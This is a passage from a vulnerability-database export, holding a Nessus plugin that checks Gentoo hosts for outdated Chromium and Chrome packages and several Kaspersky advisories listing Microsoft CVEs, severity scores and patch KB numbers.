"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:22", "description": "The remote host is affected by the vulnerability described in GLSA-202104-08 (Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google Chrome. 
Please review the CVE identifiers referenced below for details.\n Impact :\n\n Please review the referenced CVE identifiers for details.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-05-03T00:00:00", "type": "nessus", "title": "GLSA-202104-08 : Chromium, Google Chrome: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21142", "CVE-2021-21143", "CVE-2021-21144", "CVE-2021-21145", "CVE-2021-21146", "CVE-2021-21147", "CVE-2021-21148", "CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", 
"CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-2119", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193", "CVE-2021-21194", "CVE-2021-21195", "CVE-2021-21196", "CVE-2021-21197", "CVE-2021-21198", "CVE-2021-21199", "CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21206", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21214", "CVE-2021-21215", "CVE-2021-21216", "CVE-2021-21217", "CVE-2021-21218", "CVE-2021-21219", "CVE-2021-21220", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226", "CVE-2021-21227", "CVE-2021-21228", "CVE-2021-21229", "CVE-2021-21230", "CVE-2021-21231", "CVE-2021-21232", "CVE-2021-21233"], "modified": "2022-12-07T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "p-cpe:/a:gentoo:linux:google-chrome", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202104-08.NASL", "href": "https://www.tenable.com/plugins/nessus/149223", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202104-08.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149223);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\"CVE-2021-21142\", \"CVE-2021-21143\", \"CVE-2021-21144\", \"CVE-2021-21145\", \"CVE-2021-21146\", \"CVE-2021-21147\", \"CVE-2021-21148\", \"CVE-2021-21149\", \"CVE-2021-21150\", \"CVE-2021-21151\", \"CVE-2021-21152\", \"CVE-2021-21153\", \"CVE-2021-21154\", \"CVE-2021-21155\", \"CVE-2021-21156\", \"CVE-2021-21157\", \"CVE-2021-21159\", \"CVE-2021-21160\", \"CVE-2021-21161\", \"CVE-2021-21162\", \"CVE-2021-21163\", \"CVE-2021-21165\", \"CVE-2021-21166\", \"CVE-2021-21167\", \"CVE-2021-21168\", \"CVE-2021-21169\", \"CVE-2021-21170\", \"CVE-2021-21171\", \"CVE-2021-21172\", \"CVE-2021-21173\", \"CVE-2021-21174\", \"CVE-2021-21175\", \"CVE-2021-21176\", \"CVE-2021-21177\", \"CVE-2021-21178\", \"CVE-2021-21179\", \"CVE-2021-21180\", \"CVE-2021-21181\", \"CVE-2021-21182\", \"CVE-2021-21183\", \"CVE-2021-21184\", \"CVE-2021-21185\", \"CVE-2021-21186\", \"CVE-2021-21187\", \"CVE-2021-21188\", \"CVE-2021-21189\", \"CVE-2021-2119\", \"CVE-2021-21191\", \"CVE-2021-21192\", \"CVE-2021-21193\", \"CVE-2021-21194\", \"CVE-2021-21195\", \"CVE-2021-21196\", \"CVE-2021-21197\", \"CVE-2021-21198\", \"CVE-2021-21199\", \"CVE-2021-21201\", \"CVE-2021-21202\", \"CVE-2021-21203\", \"CVE-2021-21204\", \"CVE-2021-21205\", \"CVE-2021-21206\", \"CVE-2021-21207\", \"CVE-2021-21208\", \"CVE-2021-21209\", \"CVE-2021-21210\", \"CVE-2021-21211\", \"CVE-2021-21212\", \"CVE-2021-21213\", \"CVE-2021-21214\", \"CVE-2021-21215\", \"CVE-2021-21216\", \"CVE-2021-21217\", \"CVE-2021-21218\", \"CVE-2021-21219\", \"CVE-2021-21220\", \"CVE-2021-21221\", \"CVE-2021-21222\", \"CVE-2021-21223\", \"CVE-2021-21224\", \"CVE-2021-21225\", \"CVE-2021-21226\", \"CVE-2021-21227\", \"CVE-2021-21228\", \"CVE-2021-21229\", 
\"CVE-2021-21230\", \"CVE-2021-21231\", \"CVE-2021-21232\", \"CVE-2021-21233\");\n script_xref(name:\"GLSA\", value:\"202104-08\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0007\");\n\n script_name(english:\"GLSA-202104-08 : Chromium, Google Chrome: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202104-08\n(Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202104-08\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-90.0.4430.93'\n All Google Chrome users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/google-chrome-90.0.4430.93'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21233\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:google-chrome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 90.0.4430.93\"), vulnerable:make_list(\"lt 90.0.4430.93\"))) flag++;\nif (qpkg_check(package:\"www-client/google-chrome\", unaffected:make_list(\"ge 90.0.4430.93\"), vulnerable:make_list(\"lt 90.0.4430.93\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium / Google Chrome\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2023-03-21T08:24:11", "description": "### *Detect date*:\n06/08/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. 
[More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2012 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows RT 8.1 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server, version 20H2 (Server Core Installation) \nWindows 8.1 for x64-based systems\n\n### 
*Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31956](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31956>) \n[CVE-2021-31973](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31973>) \n[CVE-2021-33742](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33742>) \n[CVE-2021-31954](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31954>) \n[CVE-2021-31201](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31201>) \n[CVE-2021-31199](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31199>) \n[CVE-2021-1675](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-1675>) \n[CVE-2021-31953](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31953>) \n[CVE-2021-31968](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31968>) \n[CVE-2021-31958](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31958>) \n[CVE-2021-31971](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31971>) \n[CVE-2021-26414](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-26414>) \n[CVE-2021-31959](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31959>) \n[CVE-2021-31962](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31962>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5003695](<http://support.microsoft.com/kb/5003695>) \n[5003636](<http://support.microsoft.com/kb/5003636>) \n[5003661](<http://support.microsoft.com/kb/5003661>) \n[5003667](<http://support.microsoft.com/kb/5003667>) 
\n[5003694](<http://support.microsoft.com/kb/5003694>) \n[5014742](<http://support.microsoft.com/kb/5014742>) \n[5014748](<http://support.microsoft.com/kb/5014748>) \n[5023755](<http://support.microsoft.com/kb/5023755>) \n[5023754](<http://support.microsoft.com/kb/5023754>) \n[5023759](<http://support.microsoft.com/kb/5023759>) \n[5023769](<http://support.microsoft.com/kb/5023769>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "kaspersky", "title": "KLA12198 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-33742"], "modified": "2023-03-20T00:00:00", "id": "KLA12198", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12198/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-21T08:24:09", "description": "### *Detect 
date*:\n06/08/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nVP9 Video Extensions \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2012 \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows RT 8.1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2019 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1809 for 
32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server, version 20H2 (Server Core Installation) \nWindows 8.1 for x64-based systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31975](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31975>) \n[CVE-2021-31967](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31967>) \n[CVE-2021-31973](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31973>) \n[CVE-2021-31972](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31972>) \n[CVE-2021-33742](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33742>) \n[CVE-2021-31976](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31976>) \n[CVE-2021-31199](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31199>) \n[CVE-2021-31201](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31201>) \n[CVE-2021-31970](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31970>) \n[CVE-2021-33739](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33739>) \n[CVE-2021-31971](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31971>) \n[CVE-2021-31951](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31951>) \n[CVE-2021-26414](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-26414>) \n[CVE-2021-31952](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31952>) 
\n[CVE-2021-31974](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31974>) \n[CVE-2021-31955](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31955>) \n[CVE-2021-31962](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31962>) \n[CVE-2021-31956](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31956>) \n[CVE-2021-31954](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31954>) \n[CVE-2021-1675](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-1675>) \n[CVE-2021-31953](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31953>) \n[CVE-2021-31960](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31960>) \n[CVE-2021-31968](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31968>) \n[CVE-2021-31958](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31958>) \n[CVE-2021-31959](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31959>) \n[CVE-2021-31969](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31969>) \n[CVE-2021-31977](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31977>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5003636](<http://support.microsoft.com/kb/5003636>) \n[5003681](<http://support.microsoft.com/kb/5003681>) \n[5003637](<http://support.microsoft.com/kb/5003637>) \n[5003671](<http://support.microsoft.com/kb/5003671>) \n[5003696](<http://support.microsoft.com/kb/5003696>) \n[5003646](<http://support.microsoft.com/kb/5003646>) \n[5003638](<http://support.microsoft.com/kb/5003638>) \n[5003697](<http://support.microsoft.com/kb/5003697>) \n[5003635](<http://support.microsoft.com/kb/5003635>) 
\n[5003687](<http://support.microsoft.com/kb/5003687>) \n[5014738](<http://support.microsoft.com/kb/5014738>) \n[5014746](<http://support.microsoft.com/kb/5014746>) \n[5014701](<http://support.microsoft.com/kb/5014701>) \n[5023752](<http://support.microsoft.com/kb/5023752>) \n[5023764](<http://support.microsoft.com/kb/5023764>) \n[5023756](<http://support.microsoft.com/kb/5023756>) \n[5023765](<http://support.microsoft.com/kb/5023765>) \n[5023698](<http://support.microsoft.com/kb/5023698>) \n[5023702](<http://support.microsoft.com/kb/5023702>) \n[5023696](<http://support.microsoft.com/kb/5023696>) \n[5023697](<http://support.microsoft.com/kb/5023697>) \n[5023705](<http://support.microsoft.com/kb/5023705>) \n[5023787](<http://support.microsoft.com/kb/5023787>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "kaspersky", "title": "KLA12202 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31953", 
"CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31960", "CVE-2021-31962", "CVE-2021-31967", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2023-03-20T00:00:00", "id": "KLA12202", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12202/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-08T15:46:18", "description": "### *Detect date*:\n06/08/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft System Center. Malicious users can exploit these vulnerabilities to cause denial of service, execute arbitrary code.\n\n### *Affected products*:\nMicrosoft Malware Protection Engine\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31978](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31978>) \n[CVE-2021-31985](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31985>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft System Center Operations Manager](<https://threats.kaspersky.com/en/product/Microsoft-System-Center-Operations-Manager/>)\n\n### *CVE-IDS*:\n[CVE-2021-31978](<https://vulners.com/cve/CVE-2021-31978>)2.1Warning \n[CVE-2021-31985](<https://vulners.com/cve/CVE-2021-31985>)6.8High\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "kaspersky", "title": "KLA12197 Multiple vulnerabilities in Microsoft System Center", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31978", "CVE-2021-31985"], "modified": "2021-06-22T00:00:00", "id": "KLA12197", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12197/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-28T17:35:53", "description": "### *Detect date*:\n04/22/2021\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Browser. 
